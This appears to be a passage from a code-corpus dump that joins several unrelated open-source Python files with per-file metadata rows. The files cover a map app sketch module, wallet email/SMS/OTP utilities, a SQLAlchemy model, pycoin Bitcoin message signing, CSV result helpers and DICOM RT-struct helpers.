cloud_client.auth['project_domain_id'])
else:
settings['kuryr_openstack_project_domain_name'] = (
cloud_client.auth['project_domain_name'])
return settings
if __name__ == '__main__':
print(json.dumps(build_inventory(), indent=4, sort_keys=True))
|
apache-2.0
| -2,398,377,176,609,801,000
| 36.09589
| 94
| 0.634663
| false
| 3.868571
| false
| false
| false
|
ryfx/modrana
|
modules/mod_sketch.py
|
1
|
2168
|
# -*- coding: utf-8 -*-
#----------------------------------------------------------------------------
# Sketching on touchscreen
#----------------------------------------------------------------------------
# Copyright 2008, Oliver White
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#---------------------------------------------------------------------------
from modules.base_module import RanaModule
from time import time
# only import GKT libs if GTK GUI is used
from core import gs
if gs.GUIString == "GTK":
import cairo
def getModule(*args, **kwargs):
return Sketch(*args, **kwargs)
class Sketch(RanaModule):
"""Sketching functionality"""
def __init__(self, *args, **kwargs):
RanaModule.__init__(self, *args, **kwargs)
self.points = []
if 0: # to test
m = self.m.get("menu", None)
if m:
m.clearMenu('sketch', "set:menu:None")
self.set("menu", "sketch")
def drawMenu(self, cr, menuName, args=None):
if self.get("menu", "") == "sketch":
(x, y, w, h) = self.get('viewport')
count = 0
for p in self.points:
if count == 0:
cr.move_to(p[0], p[1])
else:
cr.line_to(p[0], p[1])
count += 1
cr.stroke()
mod = self.m.get("clickHandler", None)
if mod:
mod.registerDraggableEntireScreen("sketch")
def dragEvent(self, startX, startY, dx, dy, x, y):
self.points.append((x, y))
|
gpl-3.0
| 3,229,469,049,537,184,000
| 32.369231
| 77
| 0.532749
| false
| 4.082863
| false
| false
| false
|
Paymiumm/virtual_wallet_api
|
app/api_version/utils/__init__.py
|
1
|
8126
|
# ~ util package that would hold common functionalities and tools that all versions of the api would use
# (@: Name): "mailMorth"
# (@:Description): "email Management, and automation api code"
# (@:Author): "inteliJence development team"
# under the license of Apache License 2.0 and intelijence Protective Rights please edit and use it with all the care you can give
# this
# import the user handlers
# --------------------------------------
# Import all modules and extentions
# --------------------------------------
from user import Users
from flask_mail import Message
from ext_declaration import mail
from flask import current_app, render_template
from security import generate_confirmation_token, resend_confirmation_token, generate_transact_url, confirm_transact_url
from models import User
import socket
import re
import datetime
import threading
from werkzeug.security import generate_password_hash, check_password_hash
from twilio.rest import Client
from passgen import passgen
from ext_declaration import db
# --------------------------------------
# END IMPORTATIONS
# --------------------------------------
# --------------------------------------
# Start Work
# --------------------------------------
# def generate_one_time_password():
# """passgen modules used to generate one time password"""
# value = passgen(length=6, case='both', digits=True, letters=True, punctuation=False)
# return value
# from app.email import send_email
# end all import
user = Users() # start user manager
def send_email(to, subject, template):
msg = Message(subject, recipients=[to], html=template, sender=current_app.config['MAIL_DEFAULT_SENDER'])
mail.send(msg)
states = ['ABIA',
'ADAMAWA',
'AKWA IBOM',
'ANAMBRA',
'BAUCHI',
'BAYELSA',
'BENUE',
'BORNO',
'CROSS RIVER',
'DELTA',
'EBONYI',
'EDO',
'EKITI',
'ENUGU',
'GOMBE',
'IMO',
'JIGAWA',
'KADUNA',
'KANO',
'KATSINA',
'KEBBI',
'KOGI',
'KWARA',
'LAGOS',
'NASSARAWA',
'NIGER',
'OGUN',
'ONDO',
'OSUN',
'OYO',
'PLATEAU',
'RIVERS',
'SOKOTO',
'TARABA',
'YOBE',
'ZAMFARA',
'State']
def validate_(type_, value):
if type_ == "username":
if re.match("(\S+)([A-z]+)([0-9]*)([-_]*)", value):
print()
re.match("(\S+)([A-z]+)([0-9]*)([-_]*)", value)
return True
else:
print("username regex error")
return False
elif type_ == "password":
if re.match("(\S+)", value):
return True
else:
print("password regex error")
return False
elif type_ == "fullname":
if re.match("([A-z]+) ([A-z]+)", value):
return True
else:
print("name regex error")
return False
elif type_ == "number":
if re.match("([+]+)([0-9]+)", value):
return True
else:
print("number regex error")
return False
elif type_ == "address":
if re.match("^([0-9]+)(\s*)(\S*)([a-zA-Z ]+)(\s*)(\S*)", value):
return True
else:
print("address regex error")
return False
elif type_ == "city":
if re.match("[A-z]{2,}", value):
return True
else:
print("city regex error")
return False
elif type_ == "date":
if re.match("(\d+) (\d+) \d{4}", value):
return True
else:
print("date regex error")
return False
elif type_ == "postal":
if re.match("\d{6}", value):
return True
else:
print("postal regex error")
return False
elif type_ == "state":
for x in states:
if x == value and value != "State":
return True
print("opps states is not valid")
return False
elif type_ == "email":
if re.match("([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+", value):
return True
else:
print("email regex error")
return False
def send_sms(to_number, body):
"""This function is to send_sms using twillio"""
# generate OTP
account_sid = current_app.config['TWILIO_ACCOUNT_SID']
auth_token = current_app.config['TWILIO_AUTH_TOKEN']
twilio_number = current_app.config['TWILIO_NUMBER']
client = Client(account_sid, auth_token)
client.api.messages.create(to_number, body, from_=twilio_number)
def generate_onetime_password():
# return generate_password_hash(str(random.random()))[20:26]
value = passgen(length=6, case='both', digits=True, letters=True, punctuation=False)
return value
def remove_otp(user):
user_ = User.query.filter_by(email=user).first()
user_.password_hash = ""
db.session.add(user_.password_hash)
db.session.commit()
print(user)
def activate_mail(email):
try:
token = generate_confirmation_token(email)
html = render_template('activateMail.html', confirm_url='http://127.0.0.1:8000/account/confirMail/' + token,
email='http://127.0.0.1:8000/account/resendConfirmation?email=' + email)
subject = 'Paymiumm: Confirm Your Account'
send_email(email, subject, html)
return True
except Exception as e:
print(e)
return False
except socket.gaierror as e:
print(e)
return False
def resend_activate_mail(email=""):
try:
token = resend_confirmation_token(email)
html = render_template('activateMail.html', confirm_url='http://127.0.0.1:8000/account/confirMail/' + token,
email='http://127.0.0.1:8000/account/resendConfirmation?email=' + email)
subject = 'Paymiumm: Confirm Your Account'
send_email(email, subject, html)
except Exception as e:
print(e)
return False
except socket.gaierror as e:
print(e)
return False
def exec_(email):
t = threading.Timer(3, remove_otp, args=[email])
t.start()
return True
def send_one_time_mail(user):
gP = generate_onetime_password()
print(user)
html = render_template('one_password_mail.html', one_time_password=gP)
subject = 'Paymiumm: Your one-time password'
try:
send_email(user, subject, html)
return str(gP)
except Exception as e:
print(e)
return False
except socket.gaierror as e:
print(e)
return False
def send_link_with_email(email, amount, message=None):
try:
details = {'email': email, 'amount': amount}
token = generate_transact_url(details)
html = render_template('send_money_link.html', confirm_url='' + token, email='')
subject = message
if message is None:
send_email(email, subject, html)
else:
send_email(email, subject, html)
return True
except Exception as e:
print(e)
return False
except socket.gaierror as e:
print(e)
return False
def send_link_with_text(number, amount, message=None):
try:
details = {'number': number, 'amount': amount}
token = generate_transact_url(details)
subject = message
if message is None:
send_sms(to_number=number, body=token)
else:
send_sms(to_number=number, body=token)
return True
except Exception as e:
print(e)
return False
|
apache-2.0
| -1,626,510,524,226,959,000
| 24.469055
| 129
| 0.52412
| false
| 3.888038
| false
| false
| false
|
aurigadl/EnvReactAsk
|
server/apiFuec/models.py
|
1
|
3422
|
from server import db
class Fuec(db.Model):
__table_args__ = {'extend_existing': True}
__tablename__ = 'fuec'
id = db.Column(db.Integer, primary_key=True)
created_at = db.Column(db.DateTime, default=db.func.current_timestamp())
created_by = db.Column(db.Integer, db.ForeignKey('user.id'))
no_fuec = db.Column(db.String(20))
social_object = db.Column(db.String(255), nullable=False)
nit = db.Column(db.String(255))
no_agreement = db.Column(db.Integer)
contractor = db.Column(db.String(255))
id_contractor = db.Column(db.Integer)
object_agreement = db.Column(db.String(255))
origin_destination = db.Column(db.String(1000))
kind_hiring = db.Column(db.String(255))
kind_link = db.Column(db.String(255))
init_date = db.Column(db.String(255))
last_date = db.Column(db.String(255))
car_no = db.Column(db.Integer)
car_license_plate = db.Column(db.String(255))
car_model = db.Column(db.String(255))
car_brand = db.Column(db.String(255))
car_class_car = db.Column(db.Integer)
car_operation = db.Column(db.String(255))
data_driver_json = db.Column(db.String(1000))
contractor_owner = db.Column(db.String(1000))
file_pdf = db.Column(db.LargeBinary)
def __init__(self,
no_fuec,
created_by,
social_object,
nit,
no_agreement,
contractor,
id_contractor,
object_agreement,
origin_destination,
kind_hiring,
kind_link,
init_date,
last_date,
car_no,
car_license_plate,
car_model,
car_brand,
car_class_car,
car_operation,
data_driver,
contractor_owner,
file_pdf):
if no_fuec:
self.no_fuec = no_fuec
if created_by:
self.created_by = created_by
if social_object:
self.social_object = social_object.lower()
if nit:
self.nit = nit
if no_agreement:
self.no_agreement = no_agreement
if contractor:
self.contractor = contractor
if id_contractor:
self.id_contractor = id_contractor
if object_agreement:
self.object_agreement = object_agreement
if origin_destination:
self.origin_destination = origin_destination
if kind_hiring:
self.kind_hiring = kind_hiring
if kind_link:
self.kind_link = kind_link
if init_date:
self.init_date = init_date
if last_date:
self.last_date = last_date
if car_no:
self.car_no = car_no
if car_license_plate:
self.car_license_plate = car_license_plate
if car_model:
self.car_model = car_model
if car_brand:
self.car_brand = car_brand
if car_class_car:
self.car_class_car = car_class_car
if car_operation:
self.car_operation = car_operation
if data_driver:
self.data_driver_json = data_driver
if contractor_owner:
self.contractor_owner = contractor_owner
if file_pdf:
self.file_pdf = file_pdf
|
gpl-3.0
| 7,552,208,850,233,082,000
| 31.292453
| 76
| 0.544126
| false
| 3.735808
| false
| false
| false
|
moocowmoo/pycoin
|
pycoin/contrib/msg_signing.py
|
1
|
11785
|
import hashlib
import hmac
import io
import os
import re
from binascii import b2a_base64, a2b_base64
from .. import ecdsa
from ..serialize.bitcoin_streamer import stream_bc_string
from ..ecdsa import ellipticcurve, numbertheory
from ..networks import address_prefix_for_netcode, network_name_for_netcode
from ..encoding import public_pair_to_bitcoin_address, to_bytes_32, from_bytes_32, double_sha256
from ..key import Key
# According to brainwallet, this is "inputs.io" format, but it seems practical
# and is deployed in the wild. Core bitcoin doesn't offer a message wrapper like this.
signature_template = '''\
-----BEGIN {net_name} SIGNED MESSAGE-----
{msg}
-----BEGIN SIGNATURE-----
{addr}
{sig}
-----END {net_name} SIGNED MESSAGE-----'''
def parse_signed_message(msg_in):
"""
Take an "armoured" message and split into the message body, signing address
and the base64 signature. Should work on all altcoin networks, and should
accept both Inputs.IO and Multibit formats but not Armory.
Looks like RFC2550 <https://www.ietf.org/rfc/rfc2440.txt> was an "inspiration"
for this, so in case of confusion it's a reference, but I've never found
a real spec for this. Should be a BIP really.
"""
# Convert to Unix line feeds from DOS style, iff we find them, but
# restore to same at the end. The RFC implies we should be using
# DOS \r\n in the message, but that does not always happen in today's
# world of MacOS and Linux devs. A mix of types will not work here.
dos_nl = ('\r\n' in msg_in)
if dos_nl:
msg_in = msg_in.replace('\r\n', '\n')
try:
# trim any junk in front
_, body = msg_in.split('SIGNED MESSAGE-----\n', 1)
except:
raise ValueError("expecting text SIGNED MESSSAGE somewhere")
try:
# - sometimes middle sep is BEGIN BITCOIN SIGNATURE, other times just BEGIN SIGNATURE
# - choose the last instance, in case someone signs a signed message
parts = re.split('\n-----BEGIN [A-Z ]*SIGNATURE-----\n', body)
msg, hdr = ''.join(parts[:-1]), parts[-1]
except:
raise ValueError("expected BEGIN SIGNATURE line", body)
# after message, expect something like an email/http headers, so split into lines
hdr = list(filter(None, [i.strip() for i in hdr.split('\n')]))
if '-----END' not in hdr[-1]:
raise ValueError("expecting END on last line")
sig = hdr[-2]
addr = None
for l in hdr:
l = l.strip()
if not l:
continue
if l.startswith('-----END'):
break
if ':' in l:
label, value = [i.strip() for i in l.split(':', 1)]
if label.lower() == 'address':
addr = l.split(':')[1].strip()
break
continue
addr = l
break
if not addr or addr == sig:
raise ValueError("Could not find address")
if dos_nl:
msg = msg.replace('\n', '\r\n')
return msg, addr, sig
def sign_message(key, message=None, verbose=False, use_uncompressed=None, msg_hash=None):
"""
Return a signature, encoded in Base64, which can be verified by anyone using the
public key.
"""
secret_exponent = key.secret_exponent()
if not secret_exponent:
raise TypeError("Private key is required to sign a message")
addr = key.address()
netcode = key.netcode()
mhash = hash_for_signing(message, netcode) if message else msg_hash
# Use a deterministic K so our signatures are deterministic.
try:
r, s, y_odd = _my_sign(ecdsa.generator_secp256k1, secret_exponent, mhash)
except RuntimeError:
# .. except if extremely unlucky
k = from_bytes_32(os.urandom(32))
r, s, y_odd = _my_sign(ecdsa.generator_secp256k1, secret_exponent, mhash, _k=k)
is_compressed = not key._use_uncompressed(use_uncompressed)
assert y_odd in (0, 1)
# See http://bitcoin.stackexchange.com/questions/14263
# for discussion of the proprietary format used for the signature
#
# Also from key.cpp:
#
# The header byte: 0x1B = first key with even y, 0x1C = first key with odd y,
# 0x1D = second key with even y, 0x1E = second key with odd y,
# add 0x04 for compressed keys.
first = 27 + y_odd + (4 if is_compressed else 0)
sig = b2a_base64(bytearray([first]) + to_bytes_32(r) + to_bytes_32(s)).strip()
if not isinstance(sig, str):
# python3 b2a wrongness
sig = str(sig, 'ascii')
if not verbose or message is None:
return sig
return signature_template.format(
msg=message, sig=sig, addr=addr,
net_name=network_name_for_netcode(netcode).upper())
def verify_message(key_or_address, signature, message=None, msg_hash=None, netcode=None):
"""
Take a signature, encoded in Base64, and verify it against a
key object (which implies the public key),
or a specific base58-encoded pubkey hash.
"""
if isinstance(key_or_address, Key):
# they gave us a private key or a public key already loaded.
key = key_or_address
else:
key = Key.from_text(key_or_address)
netcode = netcode or key.netcode()
try:
# Decode base64 and a bitmask in first byte.
is_compressed, recid, r, s = _decode_signature(signature)
except ValueError:
return False
# Calculate hash of message used in signature
mhash = hash_for_signing(message, netcode) if message is not None else msg_hash
# Calculate the specific public key used to sign this message.
pair = _extract_public_pair(ecdsa.generator_secp256k1, recid, r, s, mhash)
# Check signing public pair is the one expected for the signature. It must be an
# exact match for this key's public pair... or else we are looking at a validly
# signed message, but signed by some other key.
#
pp = key.public_pair()
if pp:
# expect an exact match for public pair.
return pp == pair
else:
# Key() constructed from a hash of pubkey doesn't know the exact public pair, so
# must compare hashed addresses instead.
addr = key.address()
prefix = address_prefix_for_netcode(netcode)
ta = public_pair_to_bitcoin_address(pair, compressed=is_compressed, address_prefix=prefix)
return ta == addr
def msg_magic_for_netcode(netcode):
"""
We need the constant "strMessageMagic" in C++ source code, from file "main.cpp"
It is not shown as part of the signed message, but it is prefixed to the message
as part of calculating the hash of the message (for signature). It's also what
prevents a message signature from ever being a valid signature for a transaction.
Each altcoin finds and changes this string... But just simple substitution.
"""
name = network_name_for_netcode(netcode)
if netcode in ('BLK', 'BC'):
name = "BlackCoin" # NOTE: we need this particular HumpCase
# testnet, the first altcoin, didn't change header
if netcode == 'XTN':
name = "Bitcoin"
return '%s Signed Message:\n' % name
def _decode_signature(signature):
"""
Decode the internal fields of the base64-encoded signature.
"""
if signature[0] not in ('G', 'H', 'I'):
# Because we know the first char is in range(27, 35), we know
# valid first character is in this set.
raise TypeError("Expected base64 value as signature", signature)
# base 64 decode
sig = a2b_base64(signature)
if len(sig) != 65:
raise ValueError("Wrong length, expected 65")
# split into the parts.
first = ord(sig[0:1]) # py3 accomidation
r = from_bytes_32(sig[1:33])
s = from_bytes_32(sig[33:33+32])
# first byte encodes a bits we need to know about the point used in signature
if not (27 <= first < 35):
raise ValueError("First byte out of range")
# NOTE: The first byte encodes the "recovery id", or "recid" which is a 3-bit values
# which selects compressed/not-compressed and one of 4 possible public pairs.
#
first -= 27
is_compressed = bool(first & 0x4)
return is_compressed, (first & 0x3), r, s
def _extract_public_pair(generator, recid, r, s, value):
"""
Using the already-decoded parameters of the bitcoin signature,
return the specific public key pair used to sign this message.
Caller must verify this pubkey is what was expected.
"""
assert 0 <= recid < 4, recid
G = generator
n = G.order()
curve = G.curve()
order = G.order()
p = curve.p()
x = r + (n * (recid // 2))
alpha = (pow(x, 3, p) + curve.a() * x + curve.b()) % p
beta = numbertheory.modular_sqrt(alpha, p)
inv_r = numbertheory.inverse_mod(r, order)
y = beta if ((beta - recid) % 2 == 0) else (p - beta)
minus_e = -value % order
R = ellipticcurve.Point(curve, x, y, order)
Q = inv_r * (s * R + minus_e * G)
public_pair = (Q.x(), Q.y())
# check that this is the RIGHT public key? No. Leave that for the caller.
return public_pair
def hash_for_signing(msg, netcode='BTC'):
"""
Return a hash of msg, according to odd bitcoin method: double SHA256 over a bitcoin
encoded stream of two strings: a fixed magic prefix and the actual message.
"""
magic = msg_magic_for_netcode(netcode)
fd = io.BytesIO()
stream_bc_string(fd, bytearray(magic, 'ascii'))
stream_bc_string(fd, bytearray(msg, 'utf-8'))
# return as a number, since it's an input to signing algos like that anyway
return from_bytes_32(double_sha256(fd.getvalue()))
def deterministic_make_k(generator_order, secret_exponent, val,
hash_f=hashlib.sha256, trust_no_one=True):
"""
Generate K value BUT NOT according to https://tools.ietf.org/html/rfc6979
ecsda.deterministic_generate_k() was more general than it needs to be,
and I felt the hand of NSA in the wholly constants, so I simplified and
changed the salt.
"""
n = generator_order
assert hash_f().digest_size == 32
# code below has been specialized for SHA256 / bitcoin usage
assert n.bit_length() == 256
hash_size = 32
if trust_no_one:
v = b"Edward Snowden rocks the world!!"
k = b"Qwest CEO Joseph Nacchio is free"
else:
v = b'\x01' * hash_size
k = b'\x00' * hash_size
priv = to_bytes_32(secret_exponent)
if val > n:
val -= n
h1 = to_bytes_32(val)
k = hmac.new(k, v + b'\x00' + priv + h1, hash_f).digest()
v = hmac.new(k, v, hash_f).digest()
k = hmac.new(k, v + b'\x01' + priv + h1, hash_f).digest()
v = hmac.new(k, v, hash_f).digest()
while 1:
t = hmac.new(k, v, hash_f).digest()
k1 = from_bytes_32(t)
if k1 >= 1 and k1 < n:
return k1
k = hmac.new(k, v + b'\x00', hash_f).digest()
v = hmac.new(k, v, hash_f).digest()
def _my_sign(generator, secret_exponent, val, _k=None):
"""
Return a signature for the provided hash (val), using the provided
random nonce, _k or generate a deterministic K as needed.
May raise RuntimeError, in which case retrying with a new
random value k is in order.
"""
G = generator
n = G.order()
k = _k or deterministic_make_k(n, secret_exponent, val)
p1 = k * G
r = p1.x()
if r == 0:
raise RuntimeError("amazingly unlucky random number r")
s = (numbertheory.inverse_mod(k, n) *
(val + (secret_exponent * r) % n)) % n
if s == 0:
raise RuntimeError("amazingly unlucky random number s")
return (r, s, p1.y() % 2)
# EOF
|
mit
| 2,836,944,414,860,314,600
| 31.376374
| 98
| 0.623929
| false
| 3.561499
| false
| false
| false
|
google/telluride_decoding
|
telluride_decoding/csv_util.py
|
1
|
5394
|
# Copyright 2020 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities to save results to a CSV file.
Each row in the CSV file represents results for one regularization value.
The first column in each row is the regularization value, the rest of the
columns are correlation numbers for the experiments.
"""
import collections
import csv
import os
import numpy as np
from telluride_decoding import plot_util
import tensorflow.compat.v2 as tf
# User should call tf.compat.v1.enable_v2_behavior()
def write_results(file_name, regularization_list, all_results):
""""Writes results to a CSV file.
Args:
file_name: The name of the CSV file to write the results.
regularization_list: A list of the regularization values.
all_results: The correlation results as a 2D array. This results is
generated by regression.py. The first dimension is for each
regularization value, the second dimension is for each tf record file used
for testing.
"""
if len(regularization_list) != len(all_results):
raise ValueError('Length of regularization list and results do no match.')
base_dir = os.path.split(file_name)[0]
if base_dir and not tf.io.gfile.exists(base_dir):
tf.io.gfile.makedirs(base_dir)
with tf.io.gfile.GFile(file_name, 'w') as csv_file:
csv_writer = csv.writer(csv_file)
for i, regularization in enumerate(regularization_list):
row = [str(regularization),]
row.extend([str(value) for value in all_results[i]])
csv_writer.writerow(row)
def _read_results(file_name, skip_header=False):
""""Reads results from a CSV file.
Args:
file_name: The name of the CSV file to read the results.
skip_header: Skip the first line when it is a header.
Returns:
An ordered dictionary with regularization values as the keys and the
correlation results as the values.
"""
results = collections.OrderedDict()
with tf.io.gfile.GFile(file_name, 'r') as csv_file:
content = list(csv.reader(csv_file))
if skip_header:
del content[0]
for row in content:
if len(row) < 2:
raise ValueError('Row %s does not have enough columns.' % row)
regularization_value = row[0]
correlations = row[1:]
results[float(regularization_value)] = [float(c) for c in correlations]
return results
def read_all_results_from_directory(dir_name, skip_header=False, pattern=''):
"""Reads results from all the CSV files in a directory.
Args:
dir_name: A name of the directory with all the CSV files.
skip_header: Skip the first line when it is a header.
pattern: Substring that must be in the files to read.
Returns:
An ordered dictionary with regularization values as the keys and the
correlation results as the values.
"""
all_results = collections.OrderedDict()
file_names = tf.io.gfile.listdir(dir_name)
for name in file_names:
if not name.endswith('csv') or pattern not in name:
continue
curr_name = os.path.join(dir_name, name)
curr_results = _read_results(curr_name, skip_header)
if not all_results:
all_results = curr_results
continue
if all_results.keys() != curr_results.keys():
raise ValueError(
'Files do not have the same regularization values %s vs %s' %
(all_results.keys(), curr_results.keys()))
for regularization_value, correlations in curr_results.items():
all_results[regularization_value].extend(correlations)
return all_results
def plot_csv_results(test_name,
results,
golden_mean_std_dict=None,
png_file_name=None,
show_plot=False):
"""Calculates the mean and standard deviation from the results and plot them.
Args:
test_name: The name of the test that will show in the title of the plot.
results: An ordered dictionary with regularization values as the keys and
the correlation results as the values.
golden_mean_std_dict: The golden results as an ordered dictionary with the
regularization values as the keys and tuples with mean value and standard
deviations as as the values.
png_file_name: If file name is not empty, save the plot to the PNG file.
show_plot: If true, show the plot in a window.
"""
regularization_list = []
mean_list = []
std_list = []
for regularization_value in results.keys():
regularization_list.append(regularization_value)
correlations = results[regularization_value]
mean_list.append(np.mean(correlations))
std_list.append(np.std(correlations))
plot_util.plot_mean_std(
test_name,
regularization_list,
mean_list,
std_list,
golden_mean_std_dict=golden_mean_std_dict,
png_file_name=png_file_name,
show_plot=show_plot)
|
apache-2.0
| -7,502,328,681,272,178,000
| 35.945205
| 80
| 0.688172
| false
| 3.957447
| false
| false
| false
|
qurit/rt-utils
|
rt_utils/ds_helper.py
|
1
|
8750
|
import datetime
from rt_utils.image_helper import get_contours_coords
from rt_utils.utils import ROIData, SOPClassUID
import numpy as np
from pydicom.uid import generate_uid
from pydicom.dataset import Dataset, FileDataset, FileMetaDataset
from pydicom.sequence import Sequence
from pydicom.uid import ImplicitVRLittleEndian
"""
File contains helper methods that handles DICOM header creation/formatting
"""
def create_rtstruct_dataset(series_data) -> FileDataset:
ds = generate_base_dataset()
add_study_and_series_information(ds, series_data)
add_patient_information(ds, series_data)
add_refd_frame_of_ref_sequence(ds, series_data)
return ds
def generate_base_dataset() -> FileDataset:
file_name = 'rt-utils-struct'
file_meta = get_file_meta()
ds = FileDataset(file_name, {}, file_meta=file_meta, preamble=b"\0" * 128)
add_required_elements_to_ds(ds)
add_sequence_lists_to_ds(ds)
return ds
def get_file_meta() -> FileMetaDataset:
file_meta = FileMetaDataset()
file_meta.FileMetaInformationGroupLength = 202
file_meta.FileMetaInformationVersion = b'\x00\x01'
file_meta.TransferSyntaxUID = ImplicitVRLittleEndian
file_meta.MediaStorageSOPClassUID = SOPClassUID.RTSTRUCT
file_meta.MediaStorageSOPInstanceUID = generate_uid() # TODO find out random generation is fine
file_meta.ImplementationClassUID = SOPClassUID.RTSTRUCT_IMPLEMENTATION_CLASS
return file_meta
def add_required_elements_to_ds(ds: FileDataset):
dt = datetime.datetime.now()
# Append data elements required by the DICOM standarad
ds.SpecificCharacterSet = 'ISO_IR 100'
ds.InstanceCreationDate = dt.strftime('%Y%m%d')
ds.InstanceCreationTime = dt.strftime('%H%M%S.%f')
ds.StructureSetLabel = 'RTstruct'
ds.StructureSetDate = dt.strftime('%Y%m%d')
ds.StructureSetTime = dt.strftime('%H%M%S.%f')
ds.Modality = 'RTSTRUCT'
ds.Manufacturer = 'Qurit'
ds.ManufacturerModelName = 'rt-utils'
ds.InstitutionName = 'Qurit'
# Set the transfer syntax
ds.is_little_endian = True
ds.is_implicit_VR = True
# Set values already defined in the file meta
ds.SOPClassUID = ds.file_meta.MediaStorageSOPClassUID
ds.SOPInstanceUID = ds.file_meta.MediaStorageSOPInstanceUID
ds.ApprovalStatus = 'UNAPPROVED'
def add_sequence_lists_to_ds(ds: FileDataset):
ds.StructureSetROISequence = Sequence()
ds.ROIContourSequence = Sequence()
ds.RTROIObservationsSequence = Sequence()
def add_study_and_series_information(ds: FileDataset, series_data):
reference_ds = series_data[0] # All elements in series should have the same data
ds.StudyDate = reference_ds.StudyDate
ds.SeriesDate = getattr(reference_ds, 'SeriesDate', '')
ds.StudyTime = reference_ds.StudyTime
ds.SeriesTime = getattr(reference_ds, 'SeriesTime', '')
ds.StudyDescription = getattr(reference_ds, 'StudyDescription', '')
ds.SeriesDescription = getattr(reference_ds, 'SeriesDescription', '')
ds.StudyInstanceUID = reference_ds.StudyInstanceUID
ds.SeriesInstanceUID = generate_uid() # TODO: find out if random generation is ok
ds.StudyID = reference_ds.StudyID
ds.SeriesNumber = "1" # TODO: find out if we can just use 1 (Should be fine since its a new series)
def add_patient_information(ds: FileDataset, series_data):
reference_ds = series_data[0] # All elements in series should have the same data
ds.PatientName = getattr(reference_ds, 'PatientName', '')
ds.PatientID = getattr(reference_ds, 'PatientID', '')
ds.PatientBirthDate = getattr(reference_ds, 'PatientBirthDate', '')
ds.PatientSex = getattr(reference_ds, 'PatientSex', '')
ds.PatientAge = getattr(reference_ds, 'PatientAge', '')
ds.PatientSize = getattr(reference_ds, 'PatientSize', '')
ds.PatientWeight = getattr(reference_ds, 'PatientWeight', '')
def add_refd_frame_of_ref_sequence(ds: FileDataset, series_data):
refd_frame_of_ref = Dataset()
refd_frame_of_ref.FrameOfReferenceUID = generate_uid() # TODO Find out if random generation is ok
refd_frame_of_ref.RTReferencedStudySequence = create_frame_of_ref_study_sequence(series_data)
# Add to sequence
ds.ReferencedFrameOfReferenceSequence = Sequence()
ds.ReferencedFrameOfReferenceSequence.append(refd_frame_of_ref)
def create_frame_of_ref_study_sequence(series_data) -> Sequence:
reference_ds = series_data[0] # All elements in series should have the same data
rt_refd_series = Dataset()
rt_refd_series.SeriesInstanceUID = reference_ds.SeriesInstanceUID
rt_refd_series.ContourImageSequence = create_contour_image_sequence(series_data)
rt_refd_series_sequence = Sequence()
rt_refd_series_sequence.append(rt_refd_series)
rt_refd_study = Dataset()
rt_refd_study.ReferencedSOPClassUID = SOPClassUID.DETACHED_STUDY_MANAGEMENT
rt_refd_study.ReferencedSOPInstanceUID = reference_ds.StudyInstanceUID
rt_refd_study.RTReferencedSeriesSequence = rt_refd_series_sequence
rt_refd_study_sequence = Sequence()
rt_refd_study_sequence.append(rt_refd_study)
return rt_refd_study_sequence
def create_contour_image_sequence(series_data) -> Sequence:
contour_image_sequence = Sequence()
# Add each referenced image
for series in series_data:
contour_image = Dataset()
contour_image.ReferencedSOPClassUID = series.file_meta.MediaStorageSOPClassUID
contour_image.ReferencedSOPInstanceUID = series.file_meta.MediaStorageSOPInstanceUID
contour_image_sequence.append(contour_image)
return contour_image_sequence
def create_structure_set_roi(roi_data: ROIData) -> Dataset:
# Structure Set ROI Sequence: Structure Set ROI 1
structure_set_roi = Dataset()
structure_set_roi.ROINumber = roi_data.number
structure_set_roi.ReferencedFrameOfReferenceUID = roi_data.frame_of_reference_uid
structure_set_roi.ROIName = roi_data.name
structure_set_roi.ROIDescription = roi_data.description
structure_set_roi.ROIGenerationAlgorithm = 'MANUAL'
return structure_set_roi
def create_roi_contour(roi_data: ROIData, series_data) -> Dataset:
roi_contour = Dataset()
roi_contour.ROIDisplayColor = roi_data.color
roi_contour.ContourSequence = create_contour_sequence(roi_data, series_data)
roi_contour.ReferencedROINumber = str(roi_data.number)
return roi_contour
def create_contour_sequence(roi_data: ROIData, series_data) -> Sequence:
"""
Iterate through each slice of the mask
For each connected segment within a slice, create a contour
"""
contour_sequence = Sequence()
for i, series_slice in enumerate(series_data):
mask_slice = roi_data.mask[:,:,i]
# Do not add ROI's for blank slices
if np.sum(mask_slice) == 0:
print("Skipping empty mask layer")
continue
contour_coords = get_contours_coords(mask_slice, series_slice, roi_data)
for contour_data in contour_coords:
contour = create_contour(series_slice, contour_data)
contour_sequence.append(contour)
return contour_sequence
def create_contour(series_slice: Dataset, contour_data: np.ndarray) -> Dataset:
contour_image = Dataset()
contour_image.ReferencedSOPClassUID = series_slice.file_meta.MediaStorageSOPClassUID
contour_image.ReferencedSOPInstanceUID = series_slice.file_meta.MediaStorageSOPInstanceUID
# Contour Image Sequence
contour_image_sequence = Sequence()
contour_image_sequence.append(contour_image)
contour = Dataset()
contour.ContourImageSequence = contour_image_sequence
contour.ContourGeometricType = 'CLOSED_PLANAR' # TODO figure out how to get this value
contour.NumberOfContourPoints = len(contour_data) / 3 # Each point has an x, y, and z value
contour.ContourData = contour_data
return contour
def create_rtroi_observation(roi_data: ROIData) -> Dataset:
rtroi_observation = Dataset()
rtroi_observation.ObservationNumber = roi_data.number
rtroi_observation.ReferencedROINumber = roi_data.number
# TODO figure out how to get observation description
rtroi_observation.ROIObservationDescription = 'Type:Soft,Range:*/*,Fill:0,Opacity:0.0,Thickness:1,LineThickness:2,read-only:false'
rtroi_observation.private_creators = 'Qurit Lab'
rtroi_observation.RTROIInterpretedType = ''
rtroi_observation.ROIInterpreter = ''
return rtroi_observation
def get_contour_sequence_by_roi_number(ds, roi_number):
